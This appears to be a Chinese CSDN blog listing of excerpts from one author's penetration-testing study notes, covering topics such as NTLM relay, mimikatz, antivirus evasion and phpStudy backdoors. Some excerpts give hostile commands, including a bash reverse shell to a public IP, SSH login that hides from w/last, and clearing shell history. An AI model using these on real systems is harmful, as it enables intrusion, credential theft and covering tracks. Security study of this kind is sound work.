![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
WEB渗透学习
文章平均质量分 69
热热的雨夜
这个作者很懒,什么都没留下…
展开
-
centos6编译种树xmxxxxmm
centos6很难种树不能够净化网络环境,我记录了网上的方法原创 2022-06-19 16:33:00 · 720 阅读 · 1 评论 -
2021-10-25记一次失败的实战授权的渗透测试
注:根据中华人民共和国9.1发布的新网络空间安全法,这次渗透的过程是完全合理合法在授权范围内的,如果有认为我是非法渗透,那么律师函警告(手动艾特菜虚鲲)。本文中出现的一切网站信息,均是打码处理,所有人名信息,全部马赛克,仅仅重视技术本身,不做任何非法事情,做完测试后积极联系相关人员,告诉他们如何修补!漏洞已经完全修复!所以我才发的,,,测试用时2天,限定一周包括报告撰写,测试费用赚取1500.稿费300.那么,let`s go!一、外网打点二、寻找突破口Database: ghcfe原创 2021-10-28 23:05:10 · 8468 阅读 · 3 评论 -
学习总结一
接近一年了吧,算是一个总结。我之前一直以为渗透这个行业,类似于pwn那样是一步一个台阶,后来才发现是类似于中医那样子靠细致和耐心,积累经验的过程。一、web的学习web的学习主要是各类漏洞的利用和找寻,在实际过程中,你要在限定时间内挖掘出0day并且成功利用,是很有难度的。从常见的web基础10大漏洞上手,看视频学原理,遇到看不懂的地方太多,就需要先开始学php语言和html语言,给我的感觉就是很杂,然后做一些经典的靶场比如dvwa。也在做一些ctf的题目,增长了见识。实际上,一个好的渗透白原创 2021-10-22 19:11:35 · 2603 阅读 · 2 评论 -
2021-10-15NTLM中继攻击(ntlm delay)
终于结束了,虽然没有毕业后成为一名red进入鹅产,但是到了小产业也感觉很好。齐名虽然年轻,但是朝气蓬勃。 我觉得同事都很开心,搞渗透测试运维也不错驻场。一、原理1.1ntlm认证机制参考资料:Windows本地认证和NTLM认证总的来说就是windows下有2种认证机制,kerb和ntlm(ntlm又分为第一版本和第二版本),kb用于域内,一般是kb优先用,不行了域内才会开始用ntlm。win2000以后,ntlm认证方式的hash(密码)都会被存入到SAM文件中,域内会存入ntdl。tdl原创 2021-10-15 00:48:53 · 2336 阅读 · 0 评论 -
【漏洞复现】之PhpStudy“后门”利用复现、修复及使用脚本快速复现(最全,转自https://www.cnblogs.com/yankaohaitaiwei/p/11604762.html)
【漏洞复现】之PhpStudy“后门”利用复现、修复及使用脚本快速复现 (本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦) 该复现参考网络中的文章,该漏洞复现仅仅是为了学习交流,严禁非法使用!!! 一、事件背景 北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后...转载 2021-10-07 02:57:11 · 1124 阅读 · 0 评论 -
2021-10-07php后门利用(转自https://blog.csdn.net/god_zzZ/article/details/101678748)
【研究】PHPstudy后门利用 1.环境2.原理3.影响版本4.后门检测5.漏洞利用 1.环境 测试的是这两个版本 phpStudy_2016.11.03 后门版 PhpStudy20180211 后门版 PhpStudy软件对于国内众多开发...转载 2021-10-07 02:12:30 · 161 阅读 · 0 评论 -
phpstudy后门(转自feng)
几天前火绒说我的PHPstudy有马,我以为是误报没有在意,但接着我就在知乎上看到了PHPstudy真可能有后门,于是赶紧看了一下,还真有,是我之前下的2016版的,而我在官网下的2019的phpstudy_pro没有问题(文末给出了有后门(!!!)的安装包) 可以看到php-5....转载 2021-10-07 02:10:38 · 1896 阅读 · 0 评论 -
2021-10-02PE文件学习
PE文件学习推荐工具:lord PE、stud PE 《PE权威指南》,了解格式,看雪,吾爱破解 ,EXE是如何组成的,如何逆向一个EXE文件和安卓文件。这些东西不能不知道EXE文件和DLL文件实际上是一样的,唯一的区别就是用一个字段标示出了这个文件是EXE文件还是DLL文件64位不过就是把32位的字段拓展成64位,也叫PE32+文件,没本质区别。PE文件的定义基本都在“我的电脑”——下的“winnt.h”头文件中。而在这个“winnt.h”文件中的image format下就是系原创 2021-10-02 11:33:02 · 545 阅读 · 0 评论 -
免杀手法学习(纯笔记为了方便查询基本是记录大佬链接水文)
0、前言关于原理的学习可以参考远控免杀从入门到实践(1):基础篇 - FreeBuf网络安全行业门户[原创]免杀技术有一套(免杀方法大集结)(Anti-AntiVirus)-软件逆向-看雪论坛-安全社区|安全招聘|bbs.pediy.com一、mimikataz改源码方法过360免杀参考:Mimikatz源码免杀 |mimikataz是C写的,有源码,有源码的话,静态修改特征码绕过特征码扫描:图片参考月神:环境为vs2012注意:如果还是出现很多告警信息,那就降低报警级别:.原创 2021-10-01 17:06:40 · 828 阅读 · 0 评论 -
2021-09-26免杀(转自hack)|利用RGB隐写隐藏Shellcodehttps://mp.weixin.qq.com/s/X5jyqaEEoSQGRWwoBq2YwA
前言本篇文章将演示利用隐写术将 Shellcode 隐写入 PNG 图片 RGB 像素中,从而隐藏后门代码,并进行远程加载控制目标主机。实战演示需要使用 Invoke-PSImage 工具:•项目地址:https://github.com/peewpw/Invoke-PSImage首先使用 Cobalt Strike 生成 Powershell 类型(.ps1)的image-20210921133427498然后将刚才生成的 payload.ps1 文件放在 Invoke-P转载 2021-09-26 23:44:44 · 767 阅读 · 0 评论 -
VMware16在虚拟机Windows7下无法安装VMware tools问题vmware16(转自GakingChen)
1.基础信息 VMware Workstation 版本:16.1.1 build-17801498 虚拟机操作系统:Windows 7 2.问题1:无法安装VMware Tools 问题描述: Windo...转载 2021-09-26 23:03:58 · 10079 阅读 · 3 评论 -
随笔大佬笔记转j神
实操,这波实操的思路是先从官网知道目标人员的姓名,然后通过exchange打点,然后发现打下来的点在域里,然后查看域内的所有用户,发现有用户的名字和目标用户的名字非常像,记下来这个用户名。然后查看在本机登录过的用户,发现有两个用户在本机(即exchange服务器)登录过,然后通过mimikatz抓本地密码,得到该用户的口令,刚好这个用户还是域管,然后通过域管+mimikatz拿下黄金票据进行维权。通过域管账户可以知道前面的可疑用户的完整信息,发现这个 可疑用户的信息完全能对上,然后用wmic通过域管账户在域原创 2021-09-25 12:40:15 · 88 阅读 · 0 评论 -
ssh不留痕迹登录
一、远程登录ssh时候w和last无法发现ssh -T root@127.0.0.1 /bin/bash -issh -lroot 目标ip /usr/bin/bash/usr/bin/bash -i 表示在登录之后 调用bash命令-i 表示是交互式shell原因:w和last,只能发现完整的tty交互式终端,而上述命令并不会分配一个真正的tty,仅仅是调用了/bin/bash而已(接受我们的输入然后输出)#不留下.bash_historyunset HISTORY.原创 2021-09-20 16:41:43 · 3855 阅读 · 0 评论 -
再战beach靶场之web考核作业一
再战beach靶场之web考核作业一之前做过,这次boss改了这个靶场,有的步骤确实有些恶心心了,这次注重分析重点部分的技术原理,对于技术实现可能会弱化一些,所以看官见谅。。。信息收集老套路,访问172.16.6.135,会发现:查看源码,发现一串字符串,记住,这里是rc4加密,不是bs64了,改了!不过解密之后的结果还是这个:Pgibbonsdamnitfeel$goodtobeagang$ta改动二在于,你如果访问:直接访问是无法访问的,需要在自己的网卡上添原创 2021-09-16 22:55:02 · 150 阅读 · 0 评论 -
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)很紧张很“充实”的培训,今天主要是教了怎么抓取PC的密码……密码抓取5法1.1mimikatz抓取明文密码mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里猎取windows处于active状态账号明文密码,非常强大。在网上找了一些相关的文章自己的一点总结吧下载地址:https://github.com/gentilkiwi/mimikatz/rele原创 2021-09-16 22:52:35 · 1095 阅读 · 0 评论 -
网络作业一(搭建域、linux加入windows域、wmic渗透使用、linux渗透的信息收集、域环境信息收集)
网络侦查作业一(搭建域、linux加入windows域、wmic渗透使用、linux渗透的信息收集、域环境信息收集)今天培训已经很累了,我们结束了态势感知和三级跳板的课程,开始了网络侦查的学习。一、搭建域环境DC是win2008R2,为了方便我设置3台机子都是host-only,并且静态ip域内情况如下:域名:xixixi.com DNS:DC 主机名:dcAD:域管:administrator,密码dajiba123@ 普通域内用户:zq 密码dajiba...原创 2021-09-16 22:50:47 · 952 阅读 · 0 评论 -
2021-9-9web培训作业4
最近真的好累Web作业4(大作业)通达OA已知版本的漏洞的bp复现2017 11.x<11.5任意用户未授权先访问这个。拿到这个:code_uid":"{34E5EB18-3DCE-380F-C0F5-64D959E821BF}(记住:cookie一定要删除!!!!!!!!!!!)记住这个数据,访问logincheck_code.php:这个漏洞的第二种方法1. /ispirit/login_code.php {F73BA001-AA48-3A96-349..原创 2021-09-09 23:24:37 · 563 阅读 · 1 评论 -
2021-09-02防火墙和CDN、Ajax跨域
CDN内容分发网络(Content Delivery Network,简称CDN)是建立并覆盖在承载网之上,由分布在不同区域的边缘节点服务器群组成的分布式网络。CDN应用广泛,支持多种行业、多种场景内容加速,例如:图片小文件、大文件下载、视音频点播、直播流媒体、全站加速、安全加速。借用阿里云官网的例子,来简单介绍CDN的工作原理。假设通过CDN加速的域名为www.a.com,接入CDN网络,开始使用加速服务后,当终端用户(北京)发起HTTP请求时,处理流程如下:当终端用户(..原创 2021-09-02 23:46:02 · 504 阅读 · 0 评论 -
内网安全攻防学习笔记第三章隧道转
第3章 隐藏通信隧道技术 3.1 基础知识3.2 网络层隧道技术3.3 传输层隧道技术3.4 应用层隧道技术3.5 SOCKS代理3.6 压缩数据3.7 上传和下载 3.1 基础知识 隧道是一种绕过端口屏蔽的通信方式,防火墙两端的数据包通过防火墙所允许的数据包类...转载 2021-08-31 22:44:44 · 231 阅读 · 0 评论 -
2021-08-31《内网安全攻防》学习笔记,第二章-域内信息收集(转自PowerLiu)
《内网安全攻防》学习笔记,第二章-域内信息收集 2020-07-212020-07-21 15:08:47阅读 1.1K02.1 内网信息搜集概述当渗透测试人员进入内网后,面对的是一片“黑暗森林”,所以渗透测试人员首先会对当前所处的网络环境进行判断,通常的判断分为三种。我是谁?——对机器角色的判断。这是哪?——对目前机器所处网络环境的拓扑结构进行分析和判断。我在哪?——对目前机器所处位置区域的判断。2.2 搜集本机信息1:查询网络配置信息获取本机网络配置信息:ipconfig /all2:查询操作系统及软件转载 2021-08-31 22:39:58 · 2426 阅读 · 0 评论 -
2021-08-29web培训作业3(fckeditor判断,通达oa漏洞,渗透脑图)
Web3 作业一、写一个脚本判断fck的版本思路:找到“version”字段,向下取30个字符,其中规则匹配1.2 1.2.3 1.2.3.4 这样的。输出。Python脚本:import osimport reimport requestsdef check(url): headers={ 'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, l...原创 2021-08-29 22:54:07 · 778 阅读 · 0 评论 -
2021-8-18培训作业一
终于结束隔离了,来到了小安服,可把老子憋坏了,在培训刚开始的第一天,因为点儿背,主机第一次显卡坏了,第二次换了显卡之后报警1声滴滴(联想笔记本是内存条问题,结果一个大佬帮我擦拭了内存条换了一下位置,就OK了!)。然后第二天,我在装靶场的时候(培训的机子真是拉垮,还不如用我自己的电脑呢),一个人叫了我,和我聊聊。经过一番交谈,才知道这原来是一个大佬,指出了我学习过程中的问题。引发了我深刻的思考(这才不是我失眠的理由呢)。然后大佬给了我一个任务,爬取0day.today的网页内容。进去之后发现:有一个5秒重原创 2021-08-19 23:44:47 · 119 阅读 · 0 评论 -
2021-8-13胎教webug4.0靶场学习环境搭建
一、下载安装配置(记得时刻保存快照这个好习惯)链接:https://pan.baidu.com/s/1sz67padS6-dBOAvF-g9SbQ提取码:iqf8直接进去,解压这个压缩包:然后VMware打开2003的虚拟机即可。开机默认空密码,进去之后运行桌面上的PHPstudy,查看本地ip,然后即可访问(默认初始账号密码都是admin):二、登录进去后开始刷题其实挺拉垮的只有web靶场能用。...原创 2021-08-13 17:54:54 · 430 阅读 · 0 评论 -
过受限制的/bin/bash-rbash(vi法和PATH法)
rbash绕过 一、前言 在进行dc-2的靶场渗透时遇到了rbash受限,查阅了大佬们写的笔记了解一下原理,做一下总结好让自己更好的理解掌握。 首先我们要知道为什么要进行rbash绕过,rbash是受限的shell的一种此外还有rbash、rksh和rsh,为什么要对shell进...转载 2021-08-07 20:27:20 · 522 阅读 · 0 评论 -
2021-8-7在Linux里设置环境变量的方法(export PATH)
在Linux里设置环境变量的方法(export PATH) </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_body" class="blogpost-body blogpost-body-html">在Linux里设置环境变量的方法(转自玉米疯收大佬)(export PATH)一般来说,配置交叉编译工具...转载 2021-08-07 20:16:12 · 403 阅读 · 0 评论 -
2021-8-5 kali更新msf转
Kali中更新msf的命令: sudo apt update apt install metasploit-framework MSF更新后查看如下图:转载 2021-08-05 08:24:36 · 1220 阅读 · 0 评论 -
2021-8-1Redis计划任务反弹shell
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。一、搭建安装配置Redis数据库我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行...原创 2021-08-01 19:30:58 · 2219 阅读 · 2 评论 -
msf基操shell(转)
实验准备: 攻击(攻击者)主机: kali 2020.2 虚拟机 nat ...转载 2021-07-16 22:52:09 · 798 阅读 · 0 评论 -
2021-07-08phpMyAdmin利用日志文件GetSHELL
phpMyAdmin利用日志文件GetSHELLphpMyAdmin简介phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。GetSHELL前提1、phpMyAdmin利用日志文件GetSHELL前提账号必须有可读可写权限2、MySQL版本大于5.0,MySQL 5.0版本以上会创建日志文件,我们通过修改日志文件的全局变量,就可以Get转载 2021-07-08 20:45:52 · 553 阅读 · 0 评论 -
2021-7-5目录穿越ssrf配合RFI漏洞学习笔记转
目录 什么是目录遍历? 漏洞原理 实验 0x00 基础目录遍历 0x01 绝对路径 0x02 双写../绕过 0x03 URL编码绕过 0x04 绝对路径配合../ 0x05 截断文件后缀 防御 什么是目录遍历? 目录遍历(目录穿越)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据,后端系统的...转载 2021-07-05 10:43:25 · 288 阅读 · 1 评论 -
2021-7-3windows7下安装配置jdk环境(注意路径不然很容易错)
安装完jdk要是不配置,依然还和没有安装一样,根本就用不了,只有在系统中进行配置了以后才能正常使用,点击了解更多内容……下面我以Windows 7系统为例进行配置,具体步骤如下:1、打开电脑,正常进入桌面2、找到计算机,右键单击弹出快捷菜单3、在弹出的快捷菜单中,单击“属性”进入控制面板,系统管理4、单击控制面板主页下方“高级系统设置”,进入系统属性5、在系统属性窗口,找到“高级”选项,单击“环境变量”,进入配置窗口6、在环境变量配置窗口,我们要配置的是下面的“系统变量”,上面的用户变量不用管7、第一个要配转载 2021-07-03 10:11:26 · 281 阅读 · 0 评论 -
20210628kali2018安装3.7版本的Python
参考这篇文章:kali安装Python3.7但是不知道怎么回事,我没有创建软链接设置环境变量之类的,直接Python3 就是默认成了Python3.7.2,,,,之前没安装的时候是3.6的。。。。原创 2021-06-28 16:22:52 · 337 阅读 · 1 评论 -
2021-06-25kali更新火狐教程转
Kali更新安装firefox教程 cat01 2018-12-22 21:50:55 334994 1 起因台式机新装了一个Kali的虚拟机,打开后准备用burpsuite+firefox调试一个网站,于是习惯性的想装下一键代理切换的插件【FoxyProxy】,玩玩没想到:插件提示浏览器版本过低,于是决定更新下firefox的版本。注意:进行下列操作前请务必将所有的Firefox的所有窗转载 2021-06-25 23:31:12 · 1621 阅读 · 1 评论 -
2021-06-17web渗透学习之SQL报错注入
报错注入 报错注入在没法用union联合查询时用,但前提还是不能过滤一些关键的函数。 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这里主要记录一下xpath语法错误和concat+rand()+group_by()导...转载 2021-06-17 11:44:02 · 96 阅读 · 0 评论 -
2021-06-13git使用
文章目录 Git管理文件1. 初始化2. 配置个人信息3. 管理指定文件4. 生成版本5. 查看版本6. 文件的三种状态7. 版本回滚8. 恢复修改的文件 Git分支1. 查看当前所在分支2. 创建分支3. 切换分支4. 分支合并5. 删除分支 ...转载 2021-06-13 09:31:10 · 96 阅读 · 0 评论 -
2021-06-12web渗透学习之phar反序列化
概要来自Secarma的安全研究员Sam Thomas发现了一种新的漏洞利用方式,可以在不使用php函数unserialize()的前提下,引起严重的php对象注入漏洞。这个新的攻击方式被他公开在了美国的BlackHat会议演讲上,演讲主题为:”不为人所知的php反序列化漏洞”。它可以使攻击者将相关漏洞的严重程度升级为远程代码执行。我们在RIPS代码分析引擎中添加了对这种新型攻击的检测。关于流包装大多数PHP文件操作允许使用各种URL协议去访问文件路径:如data:...转载 2021-06-12 20:50:22 · 242 阅读 · 0 评论 -
2021-06-04web渗透中常见的bash反弹获取交互式窗口问题详解
bash反弹:首先公网主机监听指定端口,然后肉鸡执行bash命令向公网指定端口发送连接请求 公网主机: nc -lvvp 9090肉鸡执行: bash -i &> /dev/tcp/144.34.164.217/9090 0>&1 其中144.34.164.217为自己的公网主机12345 对命令的解释: bash -i意为创建一个交互式的bash shell&>意为将标准输出和标准错误都重定向到我们指定的文件中12 实验如下: x@DES转载 2021-06-05 11:09:51 · 223 阅读 · 0 评论 -
20210226web渗透学习之SSRF总结
翻译作者:国勇(信安之路特约作者) 原文地址:https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978SSRF 是什么服务器端请求伪造(SSRF)是指攻击者能够通过存在漏洞的 web 应用程序发送黑客制造的请求简单来说,黑客可以告诉服务器一个网址,服务器负责去请求这个网址。例如:GET /?url=http://google.com/H转载 2021-05-26 07:48:05 · 1153 阅读 · 0 评论 -
20210515web渗透学习之域渗透简单实操
这是总结前面几种域渗透的综合文章。工欲善其事必先利其器,今晚我的憨逼班长又帮我报错了加班地点,我一直是一个人在最远的加班室加班的,因为比较享受那种一个人学习的感觉吧。。今夜的郑州下着淅淅沥沥的雨,清凉的风带着雨水的气息从窗台吹进加班的书桌,一个人静静地喝着饮料听着歌前几年的神曲《爱河》,还有自己喜欢听的老版三国的主题曲《历史的天空》,一边学习web渗透,累了做做眼保健操看看《资治通鉴》。我觉得这样的人生真的很好很完美了。我喜欢一个人独处的时光,慢到能够专注做一件事,慢到仿佛能够听到时间河流流动的声息。我又回原创 2021-05-17 22:47:56 · 597 阅读 · 0 评论 -
20210515web渗透学习之内网渗透哈希攻击(转)
哈希传递攻击利用(Pass The Hash) </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_body" class="blogpost-body cnblogs-markdown">最近又...转载 2021-05-15 22:18:05 · 408 阅读 · 0 评论